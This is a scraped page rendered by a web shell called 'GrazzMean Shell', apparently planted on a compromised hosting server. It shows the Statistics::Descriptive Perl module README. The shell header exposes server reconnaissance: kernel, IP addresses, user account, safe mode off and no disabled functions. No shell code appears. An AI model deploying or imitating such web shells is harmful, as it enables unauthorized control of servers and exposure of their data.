shell bypass 403

GrazzMean Shell

Uname: Linux web3.us.cloudlogin.co 5.10.226-xeon-hst #2 SMP Fri Sep 13 12:28:44 UTC 2024 x86_64
Software: Apache
PHP version: 8.1.31 [ PHP INFO ] PHP os: Linux
Server Ip: 162.210.96.117
Your Ip: 18.118.254.189
User: edustar (269686) | Group: tty (888)
Safe Mode: OFF
Disable Function:
NONE

name : README
INSTALLATION

To install this module, run the following commands:

    perl Build.PL
    ./Build
    ./Build test
    ./Build install

SUPPORT AND DOCUMENTATION

After installing, you can find documentation for this module with the
perldoc command.

    perldoc Statistics::Descriptive

You can also look for information at:

    RT, CPAN's request tracker
        http://rt.cpan.org/NoAuth/Bugs.html?Dist=Statistics-Descriptive

    CPAN Ratings
        http://cpanratings.perl.org/d/Statistics-Descriptive

    Search CPAN
        http://metacpan.org/release/Statistics-Descriptive

COPYRIGHT AND LICENCE

This program is released under the following license: perl

------------

Old README:
===========

This new version (2.5) of Statistics::Descriptive contains:

- frequency_distribution was modified so that specific bins could be
  defined.  Also, caching was fixed so that it works.

- Lots of changes to the test suite to enhance coverage.

- Caching was removed from least_squares_fit since it didn't make
  sense.

- Added user survey to distribution.

List of methods by class:

Statistics::Descriptive::Sparse
----------------------------------
add_data
count
mean
sum
variance
pseudo_variance
min
max
mindex
maxdex
standard_deviation
sample_range

Statistics::Descriptive::Full
----------------------------------
All methods above and:
get_data
sort_data
presorted
percentile
median
trimmed_mean
harmonic_mean
mode
geometric_mean
frequency_distribution
least_squares_fit

ckuskie@cpan.org
© 2025 GrazzMean